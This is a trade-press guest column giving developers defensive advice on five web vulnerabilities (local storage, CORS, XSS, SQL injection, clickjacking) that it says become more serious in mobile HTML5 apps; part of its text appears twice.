By now, developers have grown accustomed to dealing with certain “traditional” threats when it comes to Web applications. For instance, issues like injection flaws and cross-site scripting have been on the OWASP Top 10 list for years. But take those same Web applications and convert them to a mobile HTML5 application, and suddenly older and “lower-impact” threats become significantly more high-risk for the mobile platform.



It’s important for developers to remember that any vulnerability that affects Web applications can also affect mobile HTML5 applications. And because of an increased availability of features, including local storage on the device, access to contacts, location, and other sensitive information with mobile apps, these threats can become magnified in a mobile environment.



Adding to this problem is the fact that many developers use multi-platform development/deployment tools that can actually introduce vulnerabilities into the application. Not to mention, many Web app specialists are now being asked to develop mobile apps without a proper understanding of security implications.



Here are five traditional threats that are magnified in a mobile HTML5 environment:



1. Local Storage: With traditional Web apps, local storage is mostly a moot point (with the exception of cookies), so the risk is only minimal. But in a mobile app, local storage is key to the user experience, and this practice elevates the impact of this vulnerability.



All too often, mobile HTML5 apps leave sensitive user data throughout the user’s memory space that can be accessed by an unauthorized user. This may include sensitive data in plaintext files, improperly encrypted files (such as unsalted hashes), or even the encryption keys themselves. Developers must assume that any data put into the user’s memory space will be seen and manipulated by other applications and malicious actors. Tip for Developers: Do not store any sensitive user data in the local memory space.



2. Cross-Origin Resource Sharing: CORS, or the use of both internal and external libraries and resources, is a well-known issue with Web apps, but the risks are often overlooked with mobile HTML5 apps. In fact, these apps are often configured to allow resources to be used and shared among external untrusted sources. This puts the app at a much higher risk of loading malicious external scripts, particularly if hit by a cross-site scripting attack.

While Web apps are also at risk of this, the attack surface is much larger on a mobile app due to its richer features, which makes the damage potentially much greater. Tip for Developers: Limit dependence on untrusted code sources and libraries. If this can’t be avoided, then the application or server making the request to an external source should be restricted to only use whitelisted sources. 3. Cross-Site Scripting: XSS attacks in traditional Web apps can steal the user’s session or attack the browser. But with a mobile HTML5 app, the malicious script can also attack device services on the phone (i.e., steal contacts, pictures, whatever else the application has permission to). Tip for Developers: Treat all user-inputted data as hostile and untrusted. Data should be filtered to remove any malicious input as well as make use of proper output encoding before any user data is displayed on screen.4. SQL Injection: SQL injection is another common threat for Web apps that has been routinely documented by the OWASP Top 10. But in a mobile HTML5 application, in addition to attacks against a remote server’s database, you now also have to worry about rogue applications attacking local databases. Tip for Developers: To protect from SQL injections in a local database, in addition to traditional SQL injection defenses (such as using parameterized queries and scrubbing queries for malicious input), avoid storing sensitive user data in local databases.5. Cross-Frame Scripting: Also known as “clickjacking,” CFS occurs when a malicious user loads a window or frame on top of a running application, which steals data from the user when tapped or clicked. In mobile HTML5 applications, the impact of CFS is often quite severe as malicious users are sometimes able to manipulate any action on a user’s mobile device. Tip for Developers: The best way to protect against CFS is to configure the application server so that it only distributes the app if it is in the uppermost view. This server configuration setting is referred to as the X-Frame header options. XSS attacks in traditional Web apps can steal the user’s session or attack the browser. But with a mobile HTML5 app, the malicious script can also attack device services on the phone (i.e., steal contacts, pictures, whatever else the application has permission to).Treat all user-inputted data as hostile and untrusted. Data should be filtered to remove any malicious input as well as make use of proper output encoding before any user data is displayed on screen.SQL injection is another common threat for Web apps that has been routinely documented by the OWASP Top 10. But in a mobile HTML5 application, in addition to attacks against a remote server’s database, you now also have to worry about rogue applications attacking local databases.To protect from SQL injections in a local database, in addition to traditional SQL injection defenses (such as using parameterized queries and scrubbing queries for malicious input), avoid storing sensitive user data in local databases.Also known as “clickjacking,” CFS occurs when a malicious user loads a window or frame on top of a running application, which steals data from the user when tapped or clicked. In mobile HTML5 applications, the impact of CFS is often quite severe as malicious users are sometimes able to manipulate any action on a user’s mobile device.The best way to protect against CFS is to configure the application server so that it only distributes the app if it is in the uppermost view. This server configuration setting is referred to as the X-Frame header options. Geoffrey Vaughan is an IT security consultant at Security Compass, an information security firm specializing in Web and mobile application security.

Guest Views are contributions by SD Times readers. Interested in contributing a Guest View? See the guidelines for the details.